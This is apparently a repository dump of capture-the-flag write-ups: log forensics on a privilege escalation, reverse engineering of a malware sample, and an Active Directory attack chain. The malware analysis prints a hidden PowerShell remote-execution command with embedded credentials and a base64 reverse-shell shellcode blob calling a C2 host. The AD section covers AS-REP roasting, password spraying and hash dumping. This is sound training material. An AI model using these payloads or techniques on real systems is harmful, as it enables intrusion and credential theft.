I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 31.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 32.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 32.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 33.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 33.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 4.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 5.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 6.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 7.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 8.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 9.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/imagee.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/imagee.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C7 - Root Reaper Quest/README.md: -------------------------------------------------------------------------------- 1 | **C7 - Root Reaper Quest** 2 | 3 | *Shinigami-like powers have been used to elevate privileges, leaving traces in the logs with cryptic references to Bleach. Your goal: identify the binary and PID responsible for gaining root. Will you find the key hidden in the shadows? (Write only PID)* 4 | 5 | ![image.png](images/image1.png) 6 | -------------------------------------------------------------------------------- /Who Am I/Writeups/C7 - Root Reaper Quest/images/image1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C7 - Root Reaper Quest/images/image1.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C7 - Root Reaper Quest/images/image2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C7 - Root Reaper Quest/images/image2.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C7 - Root Reaper Quest/images/image3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C7 - Root Reaper Quest/images/image3.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C7 - Root Reaper Quest/images/image4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C7 - Root Reaper Quest/images/image4.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C7 - Root Reaper Quest/images/image5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C7 - Root Reaper Quest/images/image5.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C7 - Root Reaper Quest/images/image6.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C7 - Root Reaper Quest/images/image6.jpg -------------------------------------------------------------------------------- /Who Am I/Writeups/C7 - Root Reaper Quest/images/image6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C7 - Root Reaper Quest/images/image6.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C7 - Root Reaper Quest/writeup.md: -------------------------------------------------------------------------------- 1 | # C7 - Root Reaper Quest 2 | 3 | In this challenge, we are given a log file and tasked with performing a threat-hunting process. To work with this file, we can use tools like Notepad or Visual Studio Code or auditd. You can install it using the command below: 4 | 5 | `sudo apt install auditd` 6 | 7 | Once installed, we can start examining the file. A good starting point is using the `--summary` option to get an overall understanding of the file: 8 | 9 | ![image.png](images/image2.png) 10 | 11 | From the output, we can see that the account "bankai" was compromised. Our goal is to identify the type of attack that was used to gain initial access. Analyzing the results of the previous command, we notice that within a span of 1 second, there were almost 16 authentication attempts. This is a clear indication of a brute-force attack. The attacker got lucky, as we can see a successful attempt in the output. 12 | Seventeen seconds later, they used the compromised username and password to log in and successfully gained a pseudo-terminal. 13 | 14 | ![image.png](images/image3.png) 15 | 16 | Next, we need to analyze the attacker’s actions after gaining access. The first thing that likely comes to mind is that the attacker performed system enumeration. To investigate this, we can use the `--tty` parameter to generate a report on the tty keystrokes. 17 | As shown in the screenshot below, the attacker ran several commands: 18 | - `hostname` to retrieve the DNS name and set the system’s hostname or NIS domain name 19 | - `whoami` to display the username of the current user, and ls to list the contents of the current directory. 20 | - `wget` to download the linepeas script from their own machine, which was hosted on port 8000. 21 | (*LinPEAS is a script that search for possible paths to escalate privileges on*) 22 | 23 | ![image.png](images/image4.png) 24 | 25 | Now we need to determine the name of the binary that the attacker used to gain root access. This will give us the crucial piece of information required to finish this challenge: the PID responsible for it. 26 | 27 | Following the output from the previous command, we saw that the attacker executed the `lsb_release -a` command, which provides information about the Linux Standard Base (LSB) and distribution-specific details. After that, the attacker ran the `sudo -V` command, which prints the sudo version string, along with the version string of the security policy plugin and any I/O plugins. If the user invoking this command is already root, it will display the arguments passed to configure when sudo was built, and plugins may show more verbose information such as default options. 28 | 29 | Five seconds after determining the sudo version, the attacker downloaded a compressed file to the target machine, which was still hosted on their own server. They ran the `ls` command to confirm the successful download, extracted the contents, navigated to the extracted directory, and ran the `make` command to build it. 30 | 31 | At this point, we can infer that there might be a description file within the extracted directory. Once the build process was complete, the attacker executed a binary called evil. 32 | 33 | To proceed, we can use the -p parameter to list all process IDs (PIDs). Since we're particularly interested in anything related to the "evil" binary, we will use the `grep` command to filter out unnecessary information. 34 | 35 | The result we get is: 36 | 37 | ![image.png](images/image5.png) 38 | 39 | We can see that the PID of the binary is *829992*, running from the */home/sosuke_aizen/evil/evil* path at 20:27:17. Additionally, we can observe that the attacker executed the evil file using `./evil` and then verified if they had gained root access by running the `whoami` command. 40 | 41 | ![image.png](images/image6.png) 42 | 43 | It seems even the mighty Sōsuke Aizen, the genius who once transcended the boundaries of Shinigami and Hollow, was outwitted in the cyber realm. How the tables have turned! Is this mysterious hacker the next Ichigo Kurosaki? In this digital battle, the lines between the real world and the spiritual realm blur, leaving us to wonder—has Aizen found his true match in this realm? 44 | 45 | Only the Soul King knows. 46 | 47 | ![image.png](images/image6.jpg) 48 | 49 | 50 | -------------------------------------------------------------------------------- /Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 1.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 10.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 11.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 11.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 2.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 3.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 4.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 5.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 6.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 7.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 8.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 9.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/imageee.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/imageee.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C8 - In Quest for Rogue Dragon/README.md: -------------------------------------------------------------------------------- 1 | # In Quest for Rogue Dragon 2 | 3 | *A rogue dragon has invaded Isle of Berk. As a Dragon Rider, you must uncover the hidden registry key—the secret to taming this beast. Follow the trail like Hiccup and Toothless chasing the Bewilderbeast, uncovering the attacker’s lair. Can you tame this dragon before it burns everything down? The fate of Berk rests in your hands, help Hiccup in this adventure!* 4 | 5 | ![image.png](Images/imageee.png) 6 | 7 | 1. Crack the executable and observe what value crawler-point registry key is equal to (registry key path is HKLM\SOFTWARE\crawler-ctf\configuration which can be obtained from the executable). 8 | 9 | 2. This is the pastebin endpoint. Follow the redirection and observe which C2 server this executable is connecting to. -------------------------------------------------------------------------------- /Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Writeup.md: -------------------------------------------------------------------------------- 1 | # In Quest For Rogue Dragon 2 | 3 | When loading **rev.exe** into the IDA debugger and viewing its pseudocode, we observe that the executable reads from a registry key and performs some form of comparison. This behavior suggests that the malware may be validating system-specific data, potentially as a way to ensure it is running in the desired environment. 4 | 5 | ![image.png](Images/image.png) 6 | 7 | To investigate further, we can set a breakpoint on the registry query function and inspect which registry key is being accessed. By doing this, we can uncover the specific details that the malware is using to tailor its behavior to the victim’s system. 8 | 9 | ![image.png](Images/image%201.png) 10 | 11 | ![image.png](Images/image%202.png) 12 | 13 | Upon closer inspection, it becomes evident that the variable `a3` is being used as an XOR key, which is critical for decrypting the encoded data used by the malware. 14 | 15 | ![image.png](Images/image%203.png) 16 | 17 | ![image.png](Images/image%204.png) 18 | 19 | ![image.png](Images/image%205.png) 20 | 21 | Continuing the analysis, we notice that the value stored in the ECX register equals **0x12**. This value is used as part of the encryption process. The malware then base64 encodes the result and compares it to the hardcoded value `PWthVSBaISZ7`, which we suspect is a crucial part of its logic. 22 | Our next step is to decode this base64 string and decrypt the XOR-encrypted data using the key **0x12**. 23 | 24 | ![image.png](Images/image%206.png) 25 | 26 | The decoded value reveals the answer to the first question: `/ysG2H34i`. 27 | 28 | This string points us to a PasteBin endpoint, which the malware uses to retrieve additional payloads or commands. By following the link, we can gather further details about the attack and potentially uncover the final objective of the malware. 29 | 30 | ![image.png](Images/image%207.png) 31 | 32 | Upon visiting the endpoint, we find that it hosts a PowerShell script named **icsd.ps1**, which contains malicious code designed to establish persistence or gain further access to the compromised system. 33 | 34 | ``` 35 | https://github.com/HuseynAghazada/for-ctf/blob/main/icsd.ps1 36 | ``` 37 | 38 | The PowerShell script attempts to execute the following command, where a password is passed as a plain string, and credentials are created to execute the attack: 39 | 40 | ``` 41 | powershell.exe -nop -w hidden -c $pass=ConvertTo-SecureString -string 'REDACTED' -asPlainText -force;$creds=new-object -typename System.Management.Automation.PSCredential -argumentlist 'ICSD\bertholdt.hover',$pass;$ResultList=@();$iplist='10.100.11.250';foreach($ip in $iplist){$Resultlist += [System.Net.Dns]::GetHostbyAddress($ip).HostName};Invoke-Command -AsJob -ComputerName $ResultList -ScriptBlock { cmd.exe /c start powershell.exe -nop -w hidden -noni -e --REDACTED-- } -Credential $creds;Sleep 20; 42 | ``` 43 | 44 | The script establishes a reverse shell, and by passing the list of IP addresses, the attacker can control the machine remotely. The command uses a hidden window to avoid detection, making it even more challenging for the victim to realize they’ve been compromised. 45 | 46 | Next, we proceed to decode the second part of the attack. 47 | 48 | ![image.png](Images/image%208.png) 49 | 50 | We discover another base64-encoded string, which is also compressed. This data likely contains further payloads or instructions for the malware to execute. 51 | 52 | ![image.png](Images/image%209.png) 53 | 54 | This compressed data contains shellcode, which is then decoded and executed by the malware. 55 | 56 | ``` 57 | [Byte[]]$gNu7Y = [System.Convert]::FromBase64String("/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11JvndzMl8zMgAAQVZJieZIgeygAQAASYnlSbwCAB/1rBoarEFUSYnkTInxQbpMdyYH/9VMiepoAQEAAFlBuimAawD/1VBQTTHJTTHASP/ASInCSP/ASInBQbrqD9/g/9VIicdqEEFYTIniSIn5QbqZpXRh/9VIgcRAAgAASbhjbWQAAAAAAEFQQVBIieJXV1dNMcBqDVlBUOL8ZsdEJFQBAUiNRCQYxgBoSInmVlBBUEFQQVBJ/8BBUEn/yE2JwUyJwUG6ecw/hv/VSDHSSP/Kiw5BugiHHWD/1bvwtaJWQbqmlb2d/9VIg8QoPAZ8CoD74HUFu0cTcm9qAFlBidr/1Q==") 58 | ``` 59 | 60 | Our goal now is to retrieve the command-and-control (C2) server’s IP address and port. 61 | 62 | ![image.png](Images/image%2010.png) 63 | 64 | By debugging this shellcode with Ghidra, we can uncover the C2 server’s details. This will allow us to trace where the commands are being sent from and potentially stop the malware’s communication with the attacker. 65 | 66 | ![image.png](Images/image%2011.png) 67 | 68 | The IP address and port used by the C2 server are **`172.26.26.172:8181`**, providing us with the final clue needed to understand the scope of the attack and begin mitigation efforts. -------------------------------------------------------------------------------- /Who Am I/Writeups/C8 - In Quest for Rogue Dragon/rev.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/rev.exe -------------------------------------------------------------------------------- /Who Am I/Writeups/C9 - End of Rumbling/README.md: -------------------------------------------------------------------------------- 1 | **C9 - End of Rumbling** 2 | *The fate of humanity is in your hands. The Rumbling is ending, and only the chosen one can bring peace or destruction. Uncover the hidden flags, symbols of hope, and decide the outcome of the race for ehumanity.* 3 | 4 | ![image.png](images/esasimage.png) 5 | -------------------------------------------------------------------------------- /Who Am I/Writeups/C9 - End of Rumbling/images/esasimage.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/esasimage.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C9 - End of Rumbling/images/image 1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 1.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C9 - End of Rumbling/images/image 10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 10.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C9 - End of Rumbling/images/image 11.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 11.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C9 - End of Rumbling/images/image 12.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 12.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C9 - End of Rumbling/images/image 13.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 13.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C9 - End of Rumbling/images/image 14.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 14.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C9 - End of Rumbling/images/image 15.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 15.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C9 - End of Rumbling/images/image 16.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 16.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C9 - End of Rumbling/images/image 17.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 17.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C9 - End of Rumbling/images/image 18.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 18.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C9 - End of Rumbling/images/image 19.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 19.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C9 - End of Rumbling/images/image 2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 2.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C9 - End of Rumbling/images/image 20.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 20.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C9 - End of Rumbling/images/image 21.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 21.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C9 - End of Rumbling/images/image 3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 3.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C9 - End of Rumbling/images/image 4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 4.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C9 - End of Rumbling/images/image 5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 5.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C9 - End of Rumbling/images/image 6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 6.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C9 - End of Rumbling/images/image 7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 7.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C9 - End of Rumbling/images/image 8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 8.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C9 - End of Rumbling/images/image 9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 9.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C9 - End of Rumbling/images/image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C9 - End of Rumbling/writeup.md: -------------------------------------------------------------------------------- 1 | # C9 - End of Rumbling 2 | 3 | In the task need to get hidden flags during the attack. First we did an nmap scan: 4 | 5 | ![image.png](images/image.png) 6 | 7 | It seems the machine is domain controller and it is inside `icsd.local` domain. Through the hint, it seems `armin.arlert` is a domain user. Nmap has krb5-enum-users.nse script that can help us to discover potential valid users. 8 | 9 | ![image.png](images/image%201.png) 10 | 11 | Checking through impacket’s get np users, we can see that this user is ASREP roastable. After cracking this user’s hash, the password ocean is obtained. 12 | 13 | ![image.png](images/image%202.png) 14 | 15 | ![image.png](images/image%203.png) 16 | 17 | Let’s search for all AD users using `crackmapexec` tool and create a list for them. 18 | 19 | ![image.png](images/image%204.png) 20 | 21 | It seems the user Connie has the password ‘Br4tSumm3r’. According to Connie’s description, it is obvious that the user Jean has the same problem. Password spraying gives us that Jean has the same password as Connie. 22 | 23 | ![image.png](images/image%205.png) 24 | 25 | ![image.png](images/image%206.png) 26 | 27 | Jean user has read access to “Secret Mission” share. This share contains credentials for the user levi. 28 | 29 | ![image.png](images/image%207.png) 30 | 31 | ![image.png](images/image%208.png) 32 | 33 | Let’s use BloodHound: 34 | 35 | ![image.png](images/image%209.png) 36 | 37 | ![image.png](images/image%2010.png) 38 | 39 | we analized executable with ghidra and there was encoded credential 40 | 41 | ![image.png](images/image%2011.png) 42 | 43 | Upon analyzing the data with BloodHound, we identified that Levi has **ForceChangePassword** delegation over **Zeke**. This means Levi can change Zeke’s password without knowing the current one. 44 | 45 | ![image.png](images/image%2012.png) 46 | 47 | We used this delegation privilege to change Zeke's password and log in as him. 48 | 49 | ![image.png](images/image%2013.png) 50 | 51 | Interestingly, Zeke had **GenericAll** privileges over **Reiner**, which allowed us to change Reiner's password as well. This opened up further access to the system. 52 | 53 | ![image.png](images/image%2014.png) 54 | 55 | so we again used it to change password. 56 | 57 | ![image.png](images/image%2015.png) 58 | 59 | Further investigation into history data revealed that **Mikasa's** password had been leaked. Using her credentials, we gained access and found a **pcap** file, which we promptly downloaded for analysis. 60 | 61 | ![image.png](images/image%2016.png) 62 | 63 | When we login as Mikasa, we found a pcap file. We download this pcap file. 64 | 65 | ![image.png](images/image%2017.png) 66 | 67 | We started to analyze the file by tshark 68 | 69 | ![image.png](images/image%2018.png) 70 | 71 | The analysis revealed several keyboard events, which, when decoded, provided **Eren's** password. This discovery was crucial as Eren's credentials would lead us closer to the final objective. 72 | 73 | [https://gist.github.com/MightyPork/6da26e382a7ad91b5496ee55fdc73db2](https://gist.github.com/MightyPork/6da26e382a7ad91b5496ee55fdc73db2) 74 | 75 | ![image.png](images/image%2019.png) 76 | 77 | We decoded the following keypress events to uncover the password: 78 | 79 | ```jsx 80 | 0000130000000000 -> 0x13 -> p 81 | 0000040000000000 -> 0x04 -> a 82 | 0000160000000000 -> 0x16 -> s 83 | 0000160000000000 -> 0x16 -> s 84 | 00002c0000000000 -> 0x2C -> (SPACE) 85 | 00000c0000000000 -> 0x0C -> i 86 | 0000160000000000 -> 0x16 -> s 87 | 00002c0000000000 -> 0x2C -> (SPACE) 88 | 0000170000000000 -> 0x17 -> t 89 | 0000210000000000 -> 0x21 -> 4 90 | 0000170000000000 -> 0x17 -> t 91 | 0000210000000000 -> 0x21 -> 4 92 | 00000e0000000000 -> 0x0E -> k 93 | 0000210000000000 -> 0x21 -> 4 94 | 0000200000000000 -> 0x20 -> 3 95 | 0000370000000000 -> 0x37 -> . 96 | 0000280000000000 -> 0x28 -> (ENTER) 97 | ``` 98 | 99 | We used **impacket** to dump the NTLM hashes. 100 | 101 | ![image.png](images/image%2020.png) 102 | 103 | Finally, using the administrator’s credentials, we logged into the system and completed the final task. 104 | 105 | ![image.png](images/image%2021.png) --------------------------------------------------------------------------------